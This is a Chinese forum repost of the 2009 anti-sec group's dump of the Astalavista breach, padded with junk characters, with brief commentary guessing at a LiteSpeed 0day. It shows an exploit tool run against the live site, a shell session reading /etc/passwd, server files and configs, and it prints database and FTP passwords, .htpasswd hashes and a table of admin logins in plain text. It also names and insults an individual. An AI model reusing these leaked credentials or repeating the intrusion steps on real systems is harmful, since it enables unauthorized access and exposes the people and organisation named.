标题: Astalavista被蹂躏过程 [打印本页] 作者: admin 时间: 2012-11-6 21:07 标题: Astalavista被蹂躏过程 里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。 - b2 a' {2 H# \) B5 [ ) t2 ?/ U8 F" S3 M2 o5 U, l1 I[root@front3 ~]# curl -I litespeedtech.com 8 y' e' V" Y0 x6 W" ]# [HTTP/1.1 200 OK8 b3 U6 P" V3 n3 U( N
Date: Fri, 05 Jun 2009 22:54:51 GMT* ]7 \# {5 {! n6 n. u
Server: LiteSpeed7 h4 |3 p) P( Z$ M1 |! ?
: X5 S: j* `, t1 w/ o* @2 l/ O0 P
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-% [2 r4 m$ j9 ~0 ]+ @$ w: Y$ T
4 ]4 | Y' [0 I8 D
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。 2 z( S1 n ]! R& r7 y& v% F ) E0 F% c0 L- ~0 [. U: n! u4 i 6 Y" G* |6 {- i/ B/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ * F- b" a5 j4 o; u+ s0 M
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \, G& H! p1 M: |8 G$ M
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \$ q/ R7 b& T) R' C. X! D
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ / " l; R9 e6 }& X. U* X \/ \/ \/ \/ \/ \/ \/+ B+ u0 m0 E/ n! g9 t
The Hacking & Security Community/ f1 {) t* E p% B. B
[+] Founded in 1997 by a hacker computer enthusiast3 t7 l7 t# v; Q
[-] Exposed in 2009 by anti-sec group 7 z6 F& D% c: ^3 D% N: S. a. z 9 G' ~6 z. L) u( {3 {5 l3 L. p& o/ ]From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% Z( s- x+ g' u1 ^( k, l
>> 03. Who’s behind the site?0 V: K8 }- v2 X7 p+ x
>>/ B. w+ J! D; m% |: n
>> A team of security and IT professionals, and a countless number of contributors from all over the world.% @" h G- Y3 A) s9 j5 s
; s2 B& O9 x8 k3 l3 |: Y! v>> 05. Is it true that the site is visited by script-kiddies and warez fans only?+ i' @8 m3 j6 S* L+ e) i
>># c m/ g( N) W) `: [
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and - {/ M; \+ ?$ C- P: F% E9 H$ s; smilitary institutions. % n4 e0 `* X! w$ w>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.3 u3 _0 g) U2 V7 {
5 G$ f1 m! ~; v+ u! d" SWhy has Astalavista been targeted? : ^) i4 K7 @0 G/ w: p5 p% F8 O N" n' J
Other than the fact that they are not doing any of this for the “community” but . j7 r. P- a! U5 T* e" J" qfor the money, they spread exploits for kids, claim to be a security community0 u8 {5 c# |. U* R4 \ X; T6 H+ s
(with no real sense of security on their own servers), and they charge you $6.661 E. Y% ~2 p. _! K4 g
per months to access a dead forum with a directory filled with public releases3 [$ R0 w \4 D9 t m* k; q
and outdated / broken services.& ^) T5 m+ B4 K* H [
" `2 h" y8 [ V- v+ H* E
We wanted to see how good that “team of security and IT professionals” really is. ( r/ ~1 J# Q" z* [7 B5 r4 F1 M( P! O% B& |7 F- O( S
Let’s begin. 0 l9 k% x7 G; @! `) Z . I$ Z5 Z6 _ `8 T; Uanti-sec:~# ./g0tshell astalavista.com -p 80 * A, l7 r, u( p6 W[+] Connecting to astalavista.com:80 ! `( S" U. J: @[+] Grabbing banner…. n3 ~3 U/ B6 B: o3 d
LiteSpeed ; z9 A) J# O, k4 O( v[+] Injecting shellcode…) v/ E3 q: t3 w* B& S. x: u4 b
[-] Wait for it% U5 s; U2 v1 `. ^$ m3 [9 Q
, Z7 N+ A) D$ a' w- A2 _* s& H D0 C
[~] We g0tshell / d1 w0 X7 M2 r( z' yuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux- \8 p" g. e* i; @2 ^% ^
ID: uid=100(apache) gid=500(apache) groups=500(apache) 3 Z& _1 e# D5 i' ~( k( m! Y3 h1 z# K* ?) {
sh-3.2$ cat /etc/passwd 7 f* f- _+ a, k8 X% K5 V+ }. l$ Oroot:x:0:0:root:/root:/bin/bash % H. q! o7 P; G/ obin:x:1:1:bin:/bin:/sbin/nologin6 A. @# A( U/ E+ c! b
daemon:x:2:2:daemon:/sbin:/sbin/nologin ! z: h. T o+ [6 xadm:x:3:4:adm:/var/adm:/sbin/nologin 6 ^7 v0 G7 Q) r9 q" r( ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin + {* C( _7 `" a: C! l. }sync:x:5:0:sync:/sbin:/bin/sync" w! T" K' g: L% h+ w: y: Y
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown + w* U* O. `! O. s+ n- w. whalt:x:7:0:halt:/sbin:/sbin/halt/ R# k4 W9 c) O f
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin3 Q8 m+ t8 Y; q% L& u6 `. m
news:x:9:13:news:/etc/news: / ?0 n9 y2 d5 Z' [uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin * Q: f- t0 `9 roperator:x:11:0perator:/root:/sbin/nologin M7 N' O7 Z6 U0 W( i; ?: ngames:x:12:100:games:/usr/games:/sbin/nologin ! B* V; ^. y! M7 A4 s1 @6 cgopher:x:13:30:gopher:/var/gopher:/sbin/nologin 1 {/ G2 a, \0 Q! mftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ; I& `. X( F& Inobody:x:99:99:Nobody:/:/sbin/nologin / ]1 m4 @, B1 d4 P$ y+ h. n" qrpm:x:37:37::/var/lib/rpm:/sbin/nologin ( w8 g0 L. \# [4 A6 z' gdbus:x:81:81:System message bus:/:/sbin/nologin; ?2 L1 A9 B7 c9 N9 _
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin 7 T T, B* K3 fmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin 4 Z6 h8 Y0 J7 q6 `. [4 [/ `. Vsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin + c; ]) X# d; Rvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin/ P# _9 C) C) x# P. t' Q
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ; X6 G ^" O" X6 L erpc:x:32:32ortmapper RPC user:/:/sbin/nologin ( s( R2 \0 N: K. u: o' i( orpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin . h/ g& `3 Q3 r$ ~nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin + y- o3 C9 h2 |5 c0 g/ R/ d# Psshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin ; J3 n' a! w. N) R# m$ ], l( Zpcap:x:77:77::/var/arpwatch:/sbin/nologin 9 O+ Z9 C7 l' D0 pnamed:x:25:25:Named:/var/named:/sbin/nologin7 _( n5 {4 } _8 Q2 _
apache:x:100:500::/var/www:/bin/false ) e) e* p! k: ]! h Rdiradmin:x:101:101::/usr/local/directadmin:/bin/bash / S7 o h6 G. _4 Y5 |mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash : F) R, X+ q2 I% Vwebapps:x:500:501::/var/www/html:/bin/bash: e. W4 o; K7 u5 l/ W5 ~' f
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash1 \- G* h+ O5 C: ^5 e n
admin:x:501:502::/home/admin:/bin/bash4 H& A: X& ~8 i
jon:x:502:503::/home/jon:/bin/bash + m. ]; [% s! [0 S9 acom:x:503:504::/home/com:/bin/bash ) v& _. s) y) p* wntp:x:38:38::/etc/ntp:/sbin/nologin + |4 f1 V: I' n3 lais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin $ a4 X9 s. T: D6 H+ n4 fastanet:x:504:505::/home/astanet:/bin/bash$ q; ^( c6 _( }1 P" B8 N( T
avahi:x:70:70:Avahi daemon:/:/sbin/nologin$ D7 ]( N i% B7 M- R
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin4 |3 O* l4 ?$ n1 N" I
5 {; k" v& v* c- g# O4 Ish-3.2$ cat /etc/hosts + k7 b$ [9 {4 F/ O; o# Do not remove the following line, or various programs+ y8 u9 N* t9 Z4 \5 J5 Y8 q8 _
# that require network functionality will fail.% E7 B% n1 b6 I1 ]5 T" K- C5 C1 @
127.0.0.1 localhost.localdomain localhost- Y& R* S+ ?7 I
::1 localhost6.localdomain6 localhost6 . v9 i6 m0 d$ _) s2 F! A80.74.154.172 asta1.astalavistaserver.com 2 N( M9 g* F0 W9 N. g% H/ a/ L2 F
sh-3.2$ pwd2 X, {" c+ P1 i; ?
/home/com/public_html2 S; l+ U! e( O' O/ f: j. h& U7 M/ x
7 {; G8 ]9 i* Q/ ^0 k6 S" D
sh-3.2$ ls -la ' D& n) U% g3 o- k2 T& D, ftotal 18460 4 l) Y3 H3 w) {: adrwxr-xr-x 30 com apache 4096 May 28 17:06 . 9 q, h! z8 b. S' j9 V ^drwx–x–x 11 com com 4096 Jun 25 2008 .. $ ^" ?# ~5 A" h& Wdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin * }- C8 U7 W- H! ?/ u% Udrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache: Z1 `- t% j/ n2 E" m
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin8 y8 ?) o, M; C6 t" ]' A9 x- `: r
drwxrwxrwx 2 com com 4096 May 19 00:50 config & P7 K* o0 i. |1 ^' @4 tdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core0 c+ f y+ r- L! ]
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules/ J5 {! X! P9 y. R
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing, ~, d; I6 l$ p
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo# I4 c- a4 B) c; E+ R
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__' M" c9 ~5 H$ z+ A% B* Y
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php7 c1 q9 e" t9 T5 k# y
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd: `. ?% a$ I% U) o7 W+ J4 }6 R# g
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor# p) P. q0 J3 c. J" B" ]9 ]
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico6 x$ X! ?# [1 q: {
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed # M5 c% O: m) s* [0 X! U: r. U, {3 ^-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess# J8 g+ B# y. F0 t0 S# I! K! K
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak# r: i7 m7 T: P2 }) @ b
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak ( n) v& i9 M6 E6 ^drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool& r: x# l# v% m# j0 ?( s+ ^1 N
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images * ?( d; i$ I4 r, @8 y5 y-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php R8 v+ H7 R; t3 z' wdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer 1 @2 K% c6 H/ N; ~drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang 2 |" c% x4 u. \2 L- X: rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib% R6 Q# L, l% l; [! _7 ?# y# e' i
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media 6 ]. k7 c; w0 adrwxr-xr-x 8 com com 4096 May 11 12:48 modifications1 @$ a7 ^' s. k: O W) K
drwxr-xr-x 34 com com 4096 May 28 16:30 modules6 ^/ u' S! A0 o- z
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin % N6 I; q) \/ D( Hdrwxrwxr-x 22 com com 4096 May 28 17:06 _new - G3 `2 ~2 M% ?" h, i2 Ldrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old 1 }0 h+ i* N2 V6 q" P* Edrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy / q. x2 y9 J. G: e- I+ ^$ m# zdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy . F4 h& f, N. B2 I+ S* N) k7 {. k, d# v-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt t% e8 \; S8 a7 p! ~8 q$ W
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml+ h+ G6 v, c% u# p6 t
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php* ^. I( [1 z* f; G$ X
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes7 D7 U- P2 ~/ J1 f- C
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp * M! X' i; {( o, @* ~. odrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam - `7 `# c7 u2 ?8 t * u' m. r) `5 X* G1 w- u* N- Msh-3.2$ head -20 index.php $ e) k' g6 O, I _5 O<?php ( w8 E l& Z m( T) x# N. A! ]- k2 @9 m9 w+ S K1 K* A
/** ! k* q/ E& C* A6 |2 ]$ p2 R# V+ e* The main page for the CMS# a E$ ^9 T3 X! x6 C7 f5 K
* @copyright CONTREXX CMS - COMVATION AG " i5 \! ]3 |$ W3 }# _" n4 k/ I* @author Comvation Development Team' P* i4 S! u" i6 H2 T, p
* @version v1.0.9.10.1 stable( t7 A* Q+ p. x! v# q( G* `
* @package contrexx `0 }! N" X; g7 k* @subpackage core ' C3 j2 _( x3 O. l" z/ ~* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage 9 D; O6 U) B! x9 i i* @since v0.0.0.0! y8 D$ e( B* w' |8 E
* @todo Capitalize all class names in project 7 X: G9 N8 j+ j) w# O* @uses /config/configuration.php # W8 Z1 K/ Q5 I2 m5 h* @uses /config/settings.php% B2 U7 L6 t! r, O: L
* @uses /config/version.php & K7 w, G* U1 U- s* @uses /core/API.php: [2 }, s9 W* Z
* @uses /core_modules/cache/index.class.php* A' {3 |. g6 {. Q2 [( b' f
* @uses /core/error.class.php + I r, {$ @ j; P* @uses /core_modules/banner/index.class.php0 p( I6 X8 E& r6 n" _
* @uses /core_modules/contact/index.class.php ( x# V( [6 w. f% g r! v" S7 ~ . ]) d: V# w; x4 e# z0 @sh-3.2$ cd config/* X( t* P/ Q T) S2 Z8 Z
sh-3.2$ ls -la/ x4 F6 i4 _6 [( o
total 32 + s. W. f* S y1 j, bdrwxrwxrwx 2 com com 4096 May 19 00:50 . 9 v& j( [8 h: [6 f: j/ _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..( S9 g, X5 m! C s% q; X& y) N! z
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php . e- b- q/ }, q! i; b-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php8 L; N- w0 | r" I/ |
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php4 `# ?2 Q9 Z C$ A
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php 5 V7 b. r! D" p+ Y: J' s7 D, E" X9 N0 x/ Z
sh-3.2$ cat configuration.php* P0 `$ D+ l, a( i# b3 R$ a" r
[snip] : h6 h6 X# ~; Q% x8 A$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost4 l8 P5 d3 ~$ ~8 l ]
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name " z- y8 X& Z2 ]4 x3 j$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix 1 X8 H" H3 I+ \8 h" F$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username ' p3 b, ?( J6 _2 w$ Y+ E `$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password 5 ]0 S# e0 E- } I S8 @- K$ z$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)2 _2 l. y5 t7 q: k* P5 v
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..) # ^" ^0 x% y, |3 b, v[snip]1 T, U3 D( l4 {0 S" h' y: ^
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false) o+ y; [/ ?3 R5 c8 E
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode9 N/ Y6 Q2 V' w& l
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost 2 p9 @+ O- M4 ]$_FTPCONFIG['port'] = 21; // Ftp remote port5 T6 f u/ P2 F( Y+ p( x6 L% ~- }
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username Y* q, V# n+ s* _4 n7 _( [$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password9 {( A* R- B- c3 O! e
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms * {& j* V; h2 n' X " ~' J- R9 [' {# Psh-3.2$ cd ..3 ]' _8 a; R+ o2 n# {* D' }- q
sh-3.2$ cd dvd/; f* ~" K7 r$ e2 k
sh-3.2$ ls -la . r4 m6 U6 ^# stotal 2913780; @. X% q0 t/ W/ H3 k
drwxr-xr-x 2 com com 4096 Sep 9 2008 . 7 d# p; v# W' Z* _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..- Z8 a c9 i3 T% f1 e
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar 0 g3 E3 w" e$ ~2 \7 ~3 x- h/ S-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar9 h# o7 F2 x3 L* @
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar: {! C' ~) S9 V/ P
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess6 ]& B: J* j; |& L
- z; y" i( V8 z% E1 tsh-3.2$ cat .htaccess$ m. s: F9 _; f
authType Basic v( d2 E+ Q2 s7 |/ t( QauthName DVD 9 z2 t2 k! \+ ^3 P6 R, P. p/ Q: [" KauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ X. v# l0 o1 c7 E) l+ Y. p' n
require valid-user% J7 I4 N2 _ Q( s
3 a4 V+ l6 P# D! s1 Msh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd3 \5 T# J7 ^: O& t# W
DVDdownload:CRD8cuY6.MPT6 " |0 P8 C1 l4 K0 V9 [7 }9 ]% aDVDdownload2:CR8a36.wluFMg ! A) T4 w3 r; d3 {2 W, ]. [9 c0 P2 M9 q" ^6 B* t
sh-3.2$ cat test.php- J( {* H5 e! I! k3 H0 |8 J: M" r- H0 R
<?php2 j: w8 r' B* Q3 f" Y
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;' r3 ?) [8 y- z7 D, |$ }
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));$ t% R3 w0 M% T
echo $url; h& |0 a, b- l; W4 s?> 5 a# @; _" m. ]& R 7 L/ @# r1 l% }/ Rsh-3.2$ cd modifications/& v5 |: M" f8 [ | C* Q% c8 w: s
sh-3.2$ ls -la ! |9 s! ]& f, ]: { X' ]total 323 X/ A7 \8 @2 c% }
drwxr-xr-x 8 com com 4096 May 11 12:48 . 5 m+ Y" i. x4 p' v; i5 ~drwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ R; \ k& ?5 G/ _7 h% e- f
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng' T! P j7 m9 y; D+ n
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs 3 o8 c1 ]% k3 D$ f/ ydrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools+ l7 a" O) c9 R9 |0 G, }
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc - |1 x# ~# l' j* Edrwxr-xr-x 2 com com 4096 Feb 2 19:33 search0 L6 {8 w6 @; Z) B( ?3 C$ h
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp ; [# o0 F, Z7 L$ d! V4 A1 ~3 c# n+ E0 e
sh-3.2$ ls -R 3 I* f, ?% u, B/ x! s! K4 A6 q.: & V% [. {7 \. X( b3 c" wcom_avtng cronjobs onlinetools pjirc search _tmp 3 |- _/ W' W& B! j" O$ b K$ O4 |+ z' [' u" E1 A
./com_avtng:3 `) L3 u9 U; O( a2 ^( J
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts t3 m" |& O" Y( q9 R( F
+ f7 x' v9 H) }" f Bmysql> exit;5 L( V3 I" U0 Y
Bye 6 H M4 J) t# U/ y K' w- `0 @, V6 w5 t1 h% z: z4 O) b* i
[~] There you go, your “team of security and IT professionals” is a joke. 9 R! j1 k4 W9 k% _* E. {$ G1 V7 C/ b
+——————————+. I3 d. k0 y% G h8 Z
system:f82BN3+_*0 S0 m8 B2 Z' `3 t* @
Be1er0ph0r:belerophor4astacom$ L* R" e- e& D5 V' f
prozac:asta4cms!: C% E# N- o* F2 V0 F8 V
commander:mpbdaagf6m: r b9 F5 ^" a3 B
sykadul:ak29eral1 B7 ^' x6 j6 a/ j! [# ]9 Z$ R
+——————————+5 x* u# ^$ j* Q- j3 {! U) T% ^
% @( g8 M3 u% m5 d[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s) # q$ _1 C. \- Z4 c/ I- S; w6 U…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it. + P J- a6 j% a & N' t9 L% g8 l9 I6 y[~] Lets move to astalavista.net now,: k0 ?9 E, K+ Q* U9 `& ^0 Z
$ J* A# f7 x0 AFrom <链接标记[url]https://www.astalavista.net/[/url]>: " V1 i% ?, Z: t3 V1 e/ c. m8 W>> Everyone knows that the best defense is a good offense.# o7 Q( w5 ^: r7 o7 ?& E5 @/ b
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. ) Q+ \( J% r( D6 V0 Z, W>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.$ t$ _2 O. O3 Y' |
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.” 1 ~2 ~/ B; E1 j5 e" l7 o, E ( V3 z t: O3 J5 j/ h8 Q>> Go ahead, try and hack our server . in a completely legal way!1 Y7 w$ y1 J9 B) k* A
>> Learn by doing: We offer our members tricky tasks and challenges on an ; C! |2 y. y- @>> ongoing basis so you can test your knowledge and abilities. You can also # I" [& v6 Z' N, q' e' I>> demonstrate what you.ve mastered by taking part in regular hacker contests ' R5 @2 L& d5 a' ]4 R>> and war games$ J8 Z( v. b$ t1 c2 M
5 W2 E1 E) T* T! ~: n9 c' \
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!& @/ ~$ y6 o0 l1 V& W
! L9 X% h$ e+ Z
[-] Tricky task: Find home dir of astalavista.net - g p, X9 k2 J2 z( p3 p. S3 [6 j' ` y' d6 q* E: A6 l
sh-3.2$ ls -la ~astanet* q3 f/ y- T* y1 g m0 X( W4 L. S6 n
total 48 $ V% C) y a! l% ^drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 . 6 ~4 E0 t3 j* ]& u3 Q7 adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 ~5 b% G* W- o2 S
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth 5 G0 A" t' Z5 s# i! p-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history 5 G! N# O' M, Q7 y5 s) ]0 ]& \7 o-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout, o( N4 }5 Y6 {! k' M, `0 M
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ @/ f; c: e# j, P0 O
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc" \' ^ ]$ ` B/ ?1 Y) s
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains 5 U4 u4 F6 n/ `& Vdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap& |) {- j0 c4 I% m# G
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail 3 K/ u4 i r1 n) klrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html + X2 F4 A' n9 N0 \) B0 N1 ^" f# {6 R-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow$ @8 ]0 \& l# f3 _7 c+ S# S
/ v5 i& o3 d. _! y% i4 osh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ + ^ s5 j$ {. M, psh-3.2$ ls -la& a3 z% x9 Q; {& B' Z% Y; E
total 200 * ?( U# B. c$ ?5 z5 p* ?drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .# A! T0 e$ |! ?* q" b
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .." q+ n* m7 S9 k9 z8 T: a2 Z
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007 , O8 k0 B$ F& H4 J% Hdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql $ C) A* B1 Y- o3 k. D \$ v; rdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com8 l. [( @7 ]; R
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend( s$ F$ K* [! C: k
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner1 n9 N% B2 h ]% h! \# r4 d
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg 3 s3 x' T$ L& Idrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config/ k0 t4 ~$ J9 X: ]
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron9 ?/ m6 Q7 p- r
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd 0 P7 Y% B: L! O- g6 c' D-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php8 j+ |( [1 n% S7 i7 F
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico 2 s! i) l; Z# G& M5 d1 i) mdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed : o0 r7 G3 t6 ~+ ~: {drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour/ `! }2 o8 y' x( s' [4 C5 `
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess- x+ {( F6 ~7 Y, P% ]. B) _6 M
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess : k# o, q. [# G4 Q-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php+ d' n0 ^% z d" f g' F: W
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html - ?+ \4 L6 a6 h' Q-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php+ y7 Q5 Y$ N6 c, `0 {' S. U: `
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php & T# v* X, [, o2 ~! X-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf . O+ `' _8 i1 E& h2 M1 jdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc i6 n* _$ Y) ]8 R# M7 I1 s& s
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang # X0 n# ^; D9 ?$ ?) T0 kdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib ?6 x, C, d! A4 V; }7 O
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log " ?5 L5 V) j) Q0 l6 Z5 D6 bdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member; y$ [, @# S+ K& j% b0 v
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata # ]( ?: k7 O* }9 `2 Hdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new. m" S3 j: D$ Z, k: U6 ?
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf+ O9 X1 t2 K9 Q3 N2 N" e
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re" z: W# C6 S0 H+ d' y) i
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt * G! A/ f# D5 i! adrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss: c, k+ Q- U8 O" B+ r Z9 q
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources5 k: g8 X7 M3 N& J
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com 9 T" u! ^+ i5 rdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes* u* g0 d0 `) Q3 j# |
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src, x, u& [3 N" O
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl4 _: C1 j* S+ {1 z! H; g
